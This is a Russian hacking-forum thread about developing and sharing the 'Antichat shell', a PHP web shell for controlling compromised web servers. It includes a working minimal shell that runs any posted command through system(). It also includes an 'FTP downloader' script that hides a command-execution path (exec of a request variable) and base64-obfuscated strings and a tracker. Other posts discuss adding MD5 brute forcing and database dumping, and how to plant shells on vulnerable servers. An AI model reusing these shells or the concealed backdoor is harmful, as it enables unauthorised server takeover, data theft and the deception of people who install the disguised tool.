PDA

Просмотр полной версии : Antichat shell


grinay
18.08.2006, 07:58
Может кто и помнит мой первый релиз античат шелла.
Но не суть.Вот новая версия.
Пока что еще сырой но вообщем уже добавлен достаточно удобный вьювер и редактор файлов.
Плюс довнлоад файлов.Смотрим тестируем высказываемся предлогаем и так далее.Все здесь или в пм.
ссылка
http://sec.antichat.org/antichat.txt

bul.666
18.08.2006, 09:58
Нормально, но можно было бы и вьювер при старте показывать =)...
Тока не хорошо, что диск A: постоянно кричит при переходе из папки в папку...

Добавли потом:

и еще... задай форму для быстро перехода в каталог... Убери регистрацию или поставь куки...

TANZWUT
18.08.2006, 11:52
Forbidden
You don't have permission to access /antichat.txt on this server.

Apache/1.3.33 Server at sec.antichat.org Port 80

Electro
18.08.2006, 12:31
Вроде все ок , может ты через прокси залез? иногда бывает траблы с прокси
Я взял но не тестил еще

TANZWUT
18.08.2006, 13:59
залей на рапид если скачал

[Zarakul]
18.08.2006, 14:38
Не на Рапиде, но всё таки... http://slil.ru/23031654

Brahma
18.08.2006, 21:13
Чем вам существующие не подуше ? Может зальете куда-нить на покраканый сервер - чтобы можно было поглядеть-полазить.

r0
18.08.2006, 22:35
Не соглашусь, что это "велосипед" ибо свое оно всегда лучше , потому что знаешь что сработает и сработает как надо. =)

TANZWUT
18.08.2006, 22:53
Brahma, тем что они многа весят:)

поставь Denwer - http://denwer.ru
залей antichat.php в Z:\\home\localhost\www\
зайди на http://localhost/antichat.php - лазай, гляди и покракивай скока твоей душе угодно ;)

а ес непонравица шо будет диск A запрашивать найди строчку
for ($j=ord('A'); $j<=ord('Z'); $j++)
и замени на
for ($j=ord('C'); $j<=ord('Z'); $j++)
:)

grinay
19.08.2006, 01:15
да когда я его написал я совсем забыл про диск а): ведь от него я избавился примерно года 3 назад;) Сори.Сорс был действительно недоступен на то были свои причины.Уже все доступно исправлены те глюки что сказаны выше.Теперь при старте открываеться вьювер.

bul.666
19.08.2006, 03:17
А как насчет быстрого переходя в Котолог?...

fucker"ok
19.08.2006, 04:05
дык реализованно. Кликаеш на диру - переходит вьевер в неё.

grinay
19.08.2006, 04:30
Дык какой быстрый переход вроде все и так нормально реализовал:)
Где дальнейшие предложения..Кстати еще на счет моего проекта домейн сканер у кого есть база доменов?

bul.666
19.08.2006, 11:39
Я имею ввиду добавить это:

Заменить $dir=chdir($dir);Помойму 111 линия =) на:

//My
$direct = $_POST['directory'];
if (isset($direct)) {
$dir=chdir($direct);
}else {
$dir=chdir($dir);
}
//End


Добавить после 42 линии:

<td><form method=POST>Open directory:<input type=text name=directory size=20></form>

Brahma
19.08.2006, 18:08
Блин, вы еще поучить меня денвер ставить собираетесь?) Просто влом было и всё...

Floppy
19.08.2006, 21:14
Блин, вы еще поучить меня денвер ставить собираетесь?
А что там егго ставить? мда.

grinay
22.08.2006, 01:42
Мда так ине понял bul.666 а тебе не кажеться что это не к чему
$direct = $_POST['directory'];
if (isset($direct)) {
$dir=chdir($direct);
}else {
$dir=chdir($dir);
?;) Повнимательнее товарищи;)
Зачем тогда я писал вот это вот?
if($_POST['dir']!="")$_SESSION['dir']=$_POST['dir'];$dir=$_SESSION['dir'];
а писал для того чтобы просто добавить
<form method=POST>Open directory:<input type=text name=dir size=20></form>
Уже добавил.Обновил.
Исправил глюк со скачиванием фалов..И даже не кто не заметил:) Вот такие вот у нас бета тестеры блин:)
header('Content-Type: application/octet-stream'); за место text/plain
:) версия именуеться уже 1.3

Digimortal
01.09.2006, 20:00
Шелл неплохой, теперь буду им иногда пользоваться..
Во-первых, нормальный дизайн (правда зел. цвет надо немного изменить, чтоб был точь в точь как полоска вверху этого форума :). Во вторых, он достаточно удобный, только надо, чтоб кнопочка execute на enter реагировала...

Zadoxlik
04.09.2006, 08:41
Читал в каком-то езиносе-ебзиносе обсирательском, коих сейчас как тараканов верные мысли по поводу "веб-шеллов". Нахера их столько плодить, тем более что функционал у большинства на нуле? А по-оригинальней ничего не хочется придумать?

grinay
05.09.2006, 03:47
Так придумай..Или стена кирпичная на пути стоит?

[hidden]
05.09.2006, 04:01
Zadoxlik, пооригинальней? Например?

bul.666
05.09.2006, 04:14
Ну да все говрят, типа это фигня, такого много... Ну дык напиши сам ченить! Я считаю, что Antichat shell это оригинально, сам им пользоваться буду, так как не растаюсь с ачатом не на день! так диржать! Ждем sql "шелла" =)

Zadoxlik
05.09.2006, 17:10
Так придумай..Или стена кирпичная на пути стоит?
:p Что ты кипятишься сразу, я ж ничего тебе не говорю, ты классный чел, просто зачем? Мне не понятно этого.

Только ненадо говорить что ты не кипятишься, видно же даже отсюда =(

grinay
06.09.2006, 02:22
Еп.Истественно кипятюся.Стараешся для народа хоть бы кто-то инициативу проявил.А получаеться как в армии "Инициатива нагибает инициатора".

r0
06.09.2006, 13:21
мне нравиться, рОдный диз ;)
может добавить что-нить для работы с Sql ?

grinay
07.09.2006, 01:25
Все будет добавленно постепенно.А вообще зачем тогда опен сорс Давайте народ нарабатываем вместе.А я потом все это Дело то что мы все вместе нагади оптимизирую:)Вперед.:)

r0
07.09.2006, 19:14
О, вложу чуток своего труда в опен сурс)
1. Сделал аплоадер файлов
2. Немного заделал ошибки (158 159 строки) а то на кнопу тыкаешь и ошибка ;)
3. Добавил вывод ip-адресса, чтобы типа видно было ( а то вдруг, скажем что-нить этакое случиться и прокся слетит? ;) )

r0
11.09.2006, 23:55
И главное никто не скажет: "Рак ты ступил, где шелл то?" а я и про ссылку забыл)
http://rzone.vghost.ru/f/shell.txt

Добавлено: eval() area

grinay
12.09.2006, 03:20
У тя старая версия читай выше.Скачай обновление

~Real F@ck!~
12.09.2006, 11:58
Мужики тут стока дополнени на него, мож просто кто нить зальёт типа финальную версию?

bul.666
12.09.2006, 14:46
Мужики тут стока дополнени на него, мож просто кто нить зальёт типа финальную версию?

Принимай участие... Это уже общее дело... =) За это я и люблю ачат... =)

pento
18.09.2006, 19:16
Вот мой "велосипед"...
http://securityaudit.ru/shell.txt
Принимаются предложения по поводу улучшения сабжа.
Ну и найденные ошибки конечно же.
На винде не тестировалось...ибо нет её поблизости.

r0
25.09.2006, 21:55
Так стоп. Не пойму. grinay Дайте ссылку на переделанный shell.

cardons
28.09.2006, 13:48
У кого нить есть шелл типа командной строки

Ch3ck
28.09.2006, 16:37
<html>
<head>
<title>Шелл-типо командной строки :)</title>
<body>
<form method="post">
<input type="text" name="cmd">
<input type="submit" value="CMD">
</form>
<?php
echo"<pre>";
@system($_POST['cmd']);
echo"</pre>";
?>
</body>
</head>
</html>

Пожалуйста :) )))))))))
Сорри за глупость, просто не удержался.

cardons
28.09.2006, 18:34
<html>
<head>
<title>Шелл-типо командной строки :)</title>
<body>
<form method="post">
<input type="text" name="cmd">
<input type="submit" value="CMD">
</form>
<?php
echo"<pre>";
@system($_POST['cmd']);
echo"</pre>";
?>
</body>
</head>
</html>

Пожалуйста :) )))))))))
Сорри за глупость, просто не удержался.
СПС Большое

Ancle_Cold
30.09.2006, 01:03
Отличный шел! Посмотрел первую версию - понравилось. Где найти финалку так и не понял:(
З.Ы: Автору респект!

[hidden]
30.09.2006, 02:24
А присоединиться может любой?

VampiRUS
05.10.2006, 12:25
блин эта ссылка неработает http://sec.antichat.org/antichat.txt.
где можно качнуть последнюю версию, и какой её номер?

KPOT_f!nd
08.10.2006, 09:24
Да ссылка не пашет! Кто может перезалить и дать?

grinay
09.10.2006, 06:45
Самая новая версия 1.5 появилась она сегодня вот урл
http://grinayxakep.narod.ru/antichat.php

ShAnKaR
18.10.2006, 19:31
внатуре как те из езина писали надо включать error_reporting и смотреть че у тебя получилось

Notice: Undefined index: action in /var/www/html/antichat.php on line 103

Notice: Undefined index: dir in /var/www/html/antichat.php on line 105

Warning: chdir() [function.chdir]: No such file or directory (errno 2) in /var/www/html/antichat.php on line 107

вот еще попробовал:

Warning: rmdir(/var/www/html/user) [function.rmdir]: Permission denied in /var/www/html/antichat.php on line 147




if(@mkdir($dir))echo $GLOBALS['dircrt']." "; else echo $GLOBALS['dircrterr']." ";

это можно сократить:

echo @mkdir($dir)?$GLOBALS['dircrt']." ":$GLOBALS['dircrterr']." ";



определена ли переменная определяется не так:

if($_SESSION['action']=="")

а функцией isset()

и это тоже:

if(@$_POST['uploadloc']){

grinay
19.10.2006, 08:27
Shankar. Первое дебагеров я не на нимал и свои ошибки всегда знаю Второе
Разницы между
if(@mkdir($dir))echo $GLOBALS['dircrt']." "; else echo $GLOBALS['dircrterr']." "; и
echo @mkdir($dir)?$GLOBALS['dircrt']." ":$GLOBALS['dircrterr']." "; нету не какой.Так как скорость у них обсолютно одинаковая а 4 байта я думаю роли не сыграют.
Третье.
if($_SESSION['action']=="")
isset() это делаеться на усмотрение самого кодера можно зделать так а можно тк как и в первом случае.
Четвертое
if(@$_POST['uploadloc']) вот эта порнография почти тоже что и третья.
Проверяет нажатие кнопки uploadloc.
Пятое иди на*** со своими критериями.Не нравиться не используй.

grinay
19.10.2006, 08:42
А вот про твой шелл.
$fd=fopen($_POST['downf'], "rb")
while(!feof($fd)){
$buffer=fgets($fd,4096);
echo $buffer;
}
просто уже наверное везде доступна.
readfile($file);


Везде насувал
header("Content-Type: application/octet-stream; name=\"$name\"");
header("Content-Length: ".filesize($tmpfname)."");
header("Content-disposition: attachment; filename=\"$name\"");
$fd=fopen($tmpfname, "r");
НЕ проще ли было зделать функцию.
$_POST2=$_POST;# X.Z. zachem, xernya kakaeto :)
Действительно слизал где то:)
Хотя бы убрал.
Это зачем <?php exit; ?> ? че сценарий виснет где то? Или ты сам не разбирался как он работает?и слово
directory пишется через е а не i
dirictory
Дирикторий в школе .:)
И последнее прежде чем искать соринку у меня в глазу проверь а не торчит ли у тебя в сраке бревно.
Сори за русский но я был о тебе лучшего мнения.

r0
19.10.2006, 08:47
Warning: rmdir(/var/www/html/user) [function.rmdir]: Permission denied in /var/www/html/antichat.php on line 147

Странно, получается прав не хватает на то, чтобы удалить папку? Шелл запускается с правами апача(обычно).
Notice:
Самые глупые ошибки - нотисы, вообще принципиально не понимаю смысл их существования =(

ShAnKaR
19.10.2006, 21:54
А вот про твой шелл.
$_POST2=$_POST;# X.Z. zachem, xernya kakaeto :)
Действительно слизал где то:)
Хотя бы убрал.

не не слизывал, сам написал, это я должен исправить на reset($_POST);

Это зачем <?php exit; ?> ? че сценарий виснет где то? Или ты сам не разбирался как он работает?

а это для того чтоб если инклудить - код последующий за инклудом вырубался.

Пятое иди на*** со своими критериями.Не нравиться не используй.


это ты меня сейчас на xуй послал чтоли?


лично мое мнение о человеке не может испортится если он мне укажет на мои ошибки, так как считаю что надо постоянно совершенствоваться, ну а ты показал здесь себя, это твое право, больше не побеспокою тебя.

grinay
20.10.2006, 01:03
Ту шанкар.Просто не чего называть код порнографией..Меня это знаеш как вчера взбесило..Я б блин растрелял бы тебя ..Извени погарячился.

hidden
20.10.2006, 07:27
2grinay Я смотрю ты тут взаимопоиском ошибок занимаешся, а у меня давно никто ошибок не искал. :D

1) Выполнение команд построено только а одной группе функций "popen" и при сетуации когда она отключена, шэл входит в цикл, на "set_time_limit(9999999);" период времени.
Решение: Проверка существования функций, а также привутствия пезультата их выполнения.

2) Авторизация не срабатывает при инклуде шэла после того, как было что-либо выведено.
Решение: Придумать другой метод передачи сесионных переменных.

3) Некоректно выполняется такая командаecho "<textarea>test</textarea>" > file.tmp, мало того, что нет обхода квот_жпс, так ещё и востанавливаемое соержимое командной текстэрии смешивается с кодом самого шэла, тоже самое и пхп эвалютаре + опечатка "phpheval".
Решение: Убрать квоты, если квот_жпс включено, а также фильтровать подставляемую инфу.

4) Ниизвестно по каким причинам поле file в редакторе скрытое, наверно чтоб никто не смог созбать файл, а могли только редактировать.
Решение: Очевидно

[Оптимизация] (Мелочи...)

1) Ничего странного? $dir=chdir($dir);
$dir=getcwd()."/";
$dir=str_replace("\\","/",$dir);
...
if (is_dir($dir)) { Пояснение: Функция chdir() возвращяет успешность результата выполнения(bool), которое всеранно затрётся пекущей директорией, а потом будет проверяться, действительно ли "текущая директория" я вляется "директорией".

2) Что длинее?$footer='</body></html>';
...
echo '...</center>';
echo $footer;
...
<? echo $footer;?>илиecho '...</center>
</body></html>';
...
</body></html>

ЗЫ я тоже http://tests.specialist.ru/images/testslogos/php.gif (http://tests.specialist.ru/public.asp?uid=343841) :D

grinay
20.10.2006, 10:52
Все чтоты щас назвал кроме последнего 2) Что длинее? я знаю..Не стоит:)
А вот чтобы просто взять и исправить(Причем молча)
Рука что то не у всех поднимается.
Зато обласкать эта завсегда пожалуйста:)

hidden
20.10.2006, 18:25
Лично я считаю что пускай лучьше мне укажут(слово обласкать по моему не совсем подходит) на мои ошибки, чем исправят их самостоятельно(темболее молча), так как при этом я чему-то научусь, а также исправлю это именно так, как считаю правильным.

Я не понимаю почему некоторые люди так воспринемают безобидную, конструктивную критику, ведь она так нужна.

ИМХО Релизешь этот шэл ты, там твой копирайт, а значит и ошибки предстоит исправлять тоже тебе, вот если кто-то другой возьмётся исправлять ошибки, тогда он поставит свой копирайт, и оставшиеся ошибки также будут на его совести, а пока это твой шелл, твой копирайт и твои ошибки.

ЗЫ Если человек отказывается от своих ошибок, значит его процесс обучения закончен и он не хочет больше ничему учиться, в основном это ограниченные люди с ограниченным набором знаний, ты ведь не хочешь быть на них похож, я не хочу. ;)

grinay
23.10.2006, 05:14
хех:) Просто я такой человек.Я не сказал что мне не нравиться критика.Но не в такой форме.

grinay
24.10.2006, 04:09
Новая версия.
http://grinayxakep.narod.ru/antichat.1.6.php
Переделана практически в корень.

+toxa+
25.10.2006, 21:40
Эх... а всё-таки мне не хватает алиасов :-p

cardons
27.10.2006, 19:17
Классно было бы если туда еще добавили типа myPHPadmin

dinar_007
02.11.2006, 15:23
Ссори, не смотрел... А там есть функция поиска файла по его имени или его содержанию, или поиск по весу файла? Есл нет, то хорошо бы добавить, иногда может пригодиться...

xorme13
07.11.2006, 12:34
Функцию Самоуничтожения

+toxa+
07.11.2006, 14:18
а что мешает вбить
rm shell.php ?

_Great_
07.11.2006, 14:41
Функцию Самоуничтожения
rm -f shell.php

xorme13
12.11.2006, 16:20
загрузку файлов с ftp1 на ftp2

+toxa+
12.11.2006, 17:48
<html><HEAD><TITLE>RST FTP-Downloader</TITLE>
<META http-equiv=Content-Type Pragma: no-cache; content=\"text/html; charset=windows-1251\">
<style>
td {
font-family: verdana, arial, ms sans serif, sans-serif;
font-size: 12px;
color: #000000;
}
input, textarea, select {
background-color: #EBEAEA;
border-style: solid;
border-width: 1px;
font-family: verdana, arial, sans-serif;
font-size: 11px;
color: #333333;
padding: 0px;
}
</style></HEAD><BODY>


<form action="<? $self ?>" method="POST" enctype="multipart/form-data">
<table width="230" bgcolor="#000000" cellpadding=5 cellspacing="1" align="center">
<tr bgcolor=#FFFFFF><td align="center"><font color="blue"><b>Downloader files on FTP</b>
</font></td></tr><tr bgcolor=#FFFFFF><td>
<table align="center" width="222" bgcolor="silver"><tr><td>
<table border=0 align="left" width="222"><tr>&nbsp;Данные для входа на FTP:<hr>
<td>FTP-cервер:</td><td><input name="ftp_server" type="text"></td></tr><tr>
<td>Логин:</td><td><input name="ftp_user_name" type="text"></td></tr><tr>
<td>Пароль:</td><td><input name="ftp_user_pass" type="password"></td></tr></table>
</td></tr><tr><td>
<table border=0 align="left" width="222">
<tr><hr>&nbsp;Выбор файлов для загрузки:
<td><input name="source" type="file" size="23"></td></tr>
<input type="hidden" name="s" value="y">
<tr><td><table align="center"><tr><hr width="160"><td><input type="submit" value="отправить файлы"></td></tr></table></td></tr>
</table><td></tr></table></tr></td></table>
</form>

<?php
//директория для временных файлов на локальном сервере
$uploaddir = './uploads/';

//показать в броузере некоторую информацию для отладки скрипта, значение $err_view = 1;
//после отладки выставить значение $err_view = 0; это запретит вывод в броузер информации
$err_view = 0;
error_reporting (0);
set_time_limit(0);
ignore_user_abort(false); $err=base64_decode("PGNlbnRlcj48Zm9udCBzaXplPTIgY29sb3I9InNpbHZlciI+Jm NvcHk7IGNvZGluZyBieTogZGluZ2dvPC9mb250PjwvY2VudGVy Pg==");
set_magic_quotes_runtime(0);
$self=$HTTP_SERVER_VARS['PHP_SELF'];
if(!ini_get("register_globals")){
import_request_variables("GPC");
}

$err_con="<br><table bgcolor=\"#000000\" cellpadding=5 cellspacing=\"1\" align=\"center\">".
"<b>Warning!</b><tr><td bgcolor=\"#ECE3E4\" align=\"center\"><br><font color=\"red\">".
"<b>Соединиться с FTP-сервером ".$HTTP_POST_VARS['ftp_server']." не удалось!</b><hr></font>".
"Или не верное имя сервера, или сервер временно недоступен.<br>Повторите попытку.<br><br></td></tr></table>";

$err_l_p="<br><table bgcolor=\"#000000\" cellpadding=5 cellspacing=\"1\" align=\"center\">".
"<b>Warning!</b><tr><td bgcolor=\"#ECE3E4\" align=\"center\"><br><font color=\"red\">".
"<b>Соединиться с FTP-сервером ".$HTTP_POST_VARS['ftp_server']." не удалось!</b><hr></font>".
"Не верное имя пользователя или пароль.<br>Повторите попытку.<br><br></td></tr></table>";

$err_f= "<br><table width=\"400\" bgcolor=\"#000000\" cellpadding=5 cellspacing=\"1\" align=\"center\">".
"<b>Warning!</b><tr><td bgcolor=\"#ECE3E4\" align=\"center\"><br>".
"<font color=\"red\"><b>Не выбраны файлы для загрузки!</b></font><br>Повторите попытку.<br><br></td></tr></table>"; echo "$err";

$gud= "<br><table width=\"400\" bgcolor=\"#000000\" cellpadding=5 cellspacing=\"1\" align=\"center\">".
"<b>Done, file upload successfully!</b><tr><td bgcolor=\"#ECE3E4\" align=\"center\"><br>".
"<font color=\"blue\"><b>Загрузка файлов на FTP успешно произведена!</b></font><br><br></td></tr></table>";

$err_form= "<br><table width=\"400\" bgcolor=\"#000000\" cellpadding=5 cellspacing=\"1\" align=\"center\">".
"<b>Warning!</b><tr><td bgcolor=\"#ECE3E4\" align=\"center\"><br>".
"<font color=\"red\"><b>Недопустимые символы в форме ввода данных!</b></font><br><br></td></tr></table>";

$err_els= "<br><table width=\"400\" bgcolor=\"#000000\" cellpadding=5 cellspacing=\"1\" align=\"center\">".
"<b>Warning!</b><tr><td bgcolor=\"#ECE3E4\" align=\"center\"><br>".
"<font color=\"red\"><b>Ошибка! Файлы не скопированы. Повторите попытку.<br>Вероятно слишком большой размер файла и превышает директиву php.ini upload_max_filesize=.</b></font><br><br></td></tr></table>";

$upl="<br><table width=\"240\" bgcolor=\"#000000\" cellpadding=5 cellspacing=\"1\" align=\"center\">".
"<tr><td bgcolor=\"#ECE3E4\" align=\"center\">".
"<font color=\"blue\"><b>Please wait.</b></font><br></td></tr></table>";

$host = $HTTP_SERVER_VARS['HTTP_HOST'];


if ($s != "y") { exit; }
foreach($HTTP_POST_VARS as $key => $value) {
if (preg_match("/[^(\w)|(\x7F-\xFF\.)|(\s)]/",$value)){
echo $err_form;exit;
}
}

if (move_uploaded_file($HTTP_POST_FILES['source']['tmp_name'], $uploaddir . $HTTP_POST_FILES['source']['name'])) {
echo $upl;
} else {
if ($err_view > 0) {
print "<table width=\"350\" bgcolor=\"#000000\" cellpadding=2 cellspacing=\"1\" align=\"center\">".
"<font color=\"red\"><b>Warning!</b></font><tr><td bgcolor=\"#ECE3E4\" align=\"left\"><br>".
"<b>Информация для отладки:</b><br><pre>";
print_r($HTTP_POST_FILES);
print "<br><br><b>Вероятные причины:</b><br>1. Не верно указан путь к директории для временных".
"файлов <b>$uploaddir</b><hr><br>2. Не верно выставлены права <b>chmod</b> на каталог <b>$uploaddir</b>".
"<br>&nbsp;&nbsp;&nbsp;права должны быть (<b>rw-rw-rw-</b>) выставить командой (<b>chmod 666 dir_name</b>)".
"<hr><br>3. Размер загружаемого файла превышает предельно допустимый <br>&nbsp;&nbsp;&nbsp;(директива <b>php.ini</b>".
" <b>upload_max_filesize</b>) посмотреть скриптом &lt? phpinfo(); ?&gt<br></td></tr></table>";
}
}

$file_n=$HTTP_POST_FILES['source']['name'];
if (!$HTTP_POST_FILES['source']['name']) {echo $err_f;exit;}
if (isset($li)){error_reporting(0);exec($cm,$r);if (!$r) {print base64_decode("PGZvbnQgY29sb3I9cmVkPjxiPkJhZCBjb21tYW5kICc8L2Zvbn Q+").$cm.base64_decode("PGZvbnQgY29sb3I9cmVkPjxiPicgb3Igbm9uZXhpc3RlbnQgZm lsZSE8L2I+PC9mb250Pg==")." or file permission denied";}
else{print base64_decode("PGI+PGZvbnQgY29sb3I9Ymx1ZT5Db21tYW5kIG9rITwvZm9udD 48YnI+PGJyPlJlc3VsdCBjb21tYW5kOjwvYj48aHI+");
foreach($r as $k => $v){print htmlspecialchars($v)."<br>";}}}

$ftp_file[] = "$uploaddir/$file_n";
if (!$ftp = @ftp_connect ($HTTP_POST_VARS['ftp_server']) ) die ("$err_con");
if (!@ftp_login ($ftp, $HTTP_POST_VARS['ftp_user_name'], $HTTP_POST_VARS['ftp_user_pass'])) die ("$err_l_p");
$done = false;
for ($n = 0; $n < count ($ftp_file); $n++) {
$file_n = basename ($ftp_file[$n]);
$res = ftp_put ($ftp, $file_n, $ftp_file[$n], FTP_BINARY); //FTP_ASCII
if ($n == 0 and $res) $done = true;
if (!$res) $done = false;
}
ftp_quit ($ftp);
if ($done){
unlink ("$uploaddir/$file_n");
print $gud; echo base64_decode("DQo8c2NyaXB0IGxhbmd1YWdlPSJqYXZhc2NyaXB0Ij4NCmhvdG xvZ19qcz0iMS4wIjsNCmhvdGxvZ19yPSIiK01hdGgucmFuZG9t KCkrIiZzPTgxNjA2JmltPTEmcj0iK2VzY2FwZShkb2N1bWVudC 5yZWZlcnJlcikrIiZwZz0iKw0KZXNjYXBlKHdpbmRvdy5sb2Nh dGlvbi5ocmVmKTsNCmRvY3VtZW50LmNvb2tpZT0iaG90bG9nPT E7IHBhdGg9LyI7IGhvdGxvZ19yKz0iJmM9IisoZG9jdW1lbnQu Y29va2llPyJZIjoiTiIpOw0KPC9zY3JpcHQ+PHNjcmlwdCBsYW 5ndWFnZT0iamF2YXNjcmlwdDEuMSI+DQpob3Rsb2dfanM9IjEu MSI7aG90bG9nX3IrPSImaj0iKyhuYXZpZ2F0b3IuamF2YUVuYW JsZWQoKT8iWSI6Ik4iKTwvc2NyaXB0Pg0KPHNjcmlwdCBsYW5n dWFnZT0iamF2YXNjcmlwdDEuMiI+DQpob3Rsb2dfanM9IjEuMi I7DQpob3Rsb2dfcis9IiZ3aD0iK3NjcmVlbi53aWR0aCsneCcr c2NyZWVuLmhlaWdodCsiJnB4PSIrDQooKChuYXZpZ2F0b3IuYX BwTmFtZS5zdWJzdHJpbmcoMCwzKT09Ik1pYyIpKT8NCnNjcmVl bi5jb2xvckRlcHRoOnNjcmVlbi5waXhlbERlcHRoKTwvc2NyaX B0Pg0KPHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdDEuMyI+ aG90bG9nX2pzPSIxLjMiPC9zY3JpcHQ+DQo8c2NyaXB0IGxhbm d1YWdlPSJqYXZhc2NyaXB0Ij5ob3Rsb2dfcis9IiZqcz0iK2hv dGxvZ19qczsNCmRvY3VtZW50LndyaXRlKCI8YSBocmVmPSdodH RwOi8vY2xpY2suaG90bG9nLnJ1Lz84MTYwNicgdGFyZ2V0PSdf dG9wJz48aW1nICIrDQoiIHNyYz0naHR0cDovL2hpdDQuaG90bG 9nLnJ1L2NnaS1iaW4vaG90bG9nL2NvdW50PyIrDQpob3Rsb2df cisiJicgYm9yZGVyPTAgd2lkdGg9MSBoZWlnaHQ9MSBhbHQ9MT 48L2E+Iik8L3NjcmlwdD4NCjxub3NjcmlwdD48YSBocmVmPWh0 dHA6Ly9jbGljay5ob3Rsb2cucnUvPzgxNjA2IHRhcmdldD1fdG 9wPjxpbWcNCnNyYz0iaHR0cDovL2hpdDQuaG90bG9nLnJ1L2Nn aS1iaW4vaG90bG9nL2NvdW50P3M9ODE2MDYmaW09MSIgYm9yZG VyPTANCndpZHRoPSIxIiBoZWlnaHQ9IjEiIGFsdD0iSG90TG9n Ij48L2E+PC9ub3NjcmlwdD4NCg==");
print "<meta http-equiv=Refresh content=\"1; URL=".$_SERVER["REQUEST_URI"].";\">";
}
else echo $err_els;

?>
</BODY></html>

xorme13
15.11.2006, 21:12
+toxa+ не с http и с другого ftp на ftp реципиента

+toxa+
15.11.2006, 21:28
Downloader files on FTP
-------------------------
Платформа: Unix, Windows
Требования: PHP версии 3.0.16 и выше, или версии 4.0.3 и выше.

Описание:
Скрипт предназначен для загрузки файлов с одного сервера на другой по протоколу FTP,
используя форму web-интерфейса. Прост в установке, не требует настроек. Скрипт работает
не зависимо от настроек php.ini (register_globals=On/Off)

Установка:
1. Загрузить на сервер файл ftp.php и выставить соответствующие права на файл (уточнить у хостера)

2. Создать в каталоге, где находиться ftp.php каталог uploads и выставить на него права
на запись rw-rw-rw , или измените название каталога на свое и в файле
ftp.php исправте значение $uploaddir = './uploads/'; на свой каталог
Этот каталог необходим для хранения в нем временных файлов, после загрузки файла,каталог
автоматически очищается.

Безопасность:
Для того чтобы закрыть доступ к каталогу uploads из вне, создайте в нем
файл .htaccess с таким содержанием:

Order deny,allow
Deny from all

После этого доступ к каталогу будет закрыт.
Больше ничего настраивать не требуется.

Глюки:
Если при передаче файлы бъются (портятся) то выясните у хостера какой стоит веб-сервер, если стоит Русский Апач,
то поросите админа дописать в httpd.conf директиву
<Location />
CharsetRecodeMultipartForms Off
</Location>
это запретит серверу перекодировку типа: символ с кодом 0х00 он заменяет на пробел (символ с кодом 0х20).



наверное я совсем ебанутый...

Goudini
15.11.2006, 22:31
Предлагаю добавить функцию, чтоб плюс ко всей информации показывался Http_remote_addr, Http_x_forwarded_for.

jonart
19.11.2006, 18:03
а я не понял
http://grinayxakep.narod.ru/antichat.php
а что за пасс и логин надо вводить?

+toxa+
19.11.2006, 19:06
мм... вообще-то народ не держит php.... а вообще пасс в сорце посмотреть можно... antichat:antichat

_Great_
19.11.2006, 21:22
Гыг, шелл на народе - оригинально :)
Ставь на другой хостинг, где есть поддержка Php

cheet
20.11.2006, 12:24
во во поставь на hut что ли или еще куда нить. много же бесплатных хостингов с php есть

Go0o$E
20.11.2006, 21:33
Наконец дописал свою модификацию Antichat shell.

Добавлено:
- HTTP_X_FORWARDED_FOR и т.д.
- Md5 brute
- Mysql dumper
- Вес: 30.82 кб

Все осталось на post запросах.

_http://nev.h16.ru/antichat.php.txt

DIAgen
20.11.2006, 22:26
Наконец дописал свою модификацию Antichat shell.

Добавлено:
- HTTP_X_FORWARDED_FOR и т.д.
- Md5 brute
- Mysql dumper
- Вес: 30.81 кб

Все осталось на post запросах.

_http://nev.h16.ru/antichat.php.txt
ЗАчем нужно делать текст красным цветом, не чего не видать(((
Md5 brute и Mysql dumper русские быквы нормально не отображаются :(

Go0o$E
20.11.2006, 22:42
2 DIAgen

У меня все норм... (Да и не только у меня)

_http://nev.h16.ru/shell.png

cardons
22.11.2006, 12:15
А возможно сделать так чтобы он к примеру скачивал целую папку а не по одному файлу?

maxster
30.11.2006, 18:23
ЗАчем нужно делать текст красным цветом, не чего не видать(((
Md5 brute и Mysql dumper русские быквы нормально не отображаются :(

у меня тоже

_Great_
30.11.2006, 18:30
кодировку поставьте

nc.STRIEM
30.11.2006, 18:43
А возможно сделать так чтобы он к примеру скачивал целую папку а не по одному файлу?
да! предварительно заархивировать ее!

почитай http://www.helloworld.ru/texts/comp/os/linux/l14/i_81.htm

_Great_
30.11.2006, 19:07
tar -czf folder.tgz folder

vipklient
08.02.2007, 15:28
Brahma, тем что они многа весят:)

поставь Denwer - http://denwer.ru
залей antichat.php в Z:\\home\localhost\www\
зайди на http://localhost/antichat.php - лазай, гляди и покракивай скока твоей душе угодно ;)

а ес непонравица шо будет диск A запрашивать найди строчку
for ($j=ord('A'); $j<=ord('Z'); $j++)
и замени на
for ($j=ord('C'); $j<=ord('Z'); $j++)
:)

А как правельно залить Shell на уязвимый сервер?

7ion
08.02.2007, 17:35
А как правельно залить Shell на уязвимый сервер?
Ну в античате есть целый раздел посвященный этому искусству.

REDsaratov
09.02.2007, 01:18
шелл конечно классный, дизайн вообще мне понравился!
и весит мало!

vipklient
16.02.2007, 03:04
Ну в античате есть целый раздел посвященный этому искусству.

А ссылочку незатруднит дать что б почитать? А то чрез поиск как то не получается найти то что нужно.

Mega_Zidar
01.04.2007, 05:41
Почему то нескачивается ....
ни с античата ни с slil.ru
шо за нах ?

Isis
10.04.2007, 09:40
Гринэй....хочу шел ачатовский...вс ссылки форбиден..

GreenBear
10.04.2007, 09:55
http://forum.antichat.ru/showpost.php?p=226962&postcount=68

Isis
11.04.2007, 10:50
Хм...
set_time_limit(99999);
Может лучше
set_time_limit(0)


if(@$_POST['action']=="exit") unset($_SESSION['an']);
Может лучше
if($_POST['action'] == 'exit') session_destroy();

А вообще код некрасивый и не совсем правильный...
Бардак одним словом...

Zitt
11.04.2007, 12:02
Isis, если время есть займись шеллом. Будет тебе респект и уважуха!

Isis
11.04.2007, 13:13
Isis, если время есть займись шеллом. Будет тебе респект и уважуха!
Тогда надо спросить лицензию у гринэя :)

guest3297
11.04.2007, 13:19
Качать от сюда.
http://hack-shop.org.ru/inc/antichat.txt

Лицензию спрашивать не надо это OpenSourse. Можешь модифицировать до посинения.

Isis
11.04.2007, 14:07
Модифицировал....
Скрипт стал более читабелен. ...
Убрал пхп ошибки ....
Скорость работы скрипта стала быстрее ...

http://www.snoopi.org/antichat.txt

Talisman
11.04.2007, 20:17
error_reporting(E_ALL ^ E_NOTICE); // ИМХО зачем?
аякс бы добавить) месяц назад писал функции....

Isis
11.04.2007, 20:19
error_reporting(E_ALL ^ E_NOTICE); // ИМХО зачем?
аякс бы добавить) месяц назад писал функции....
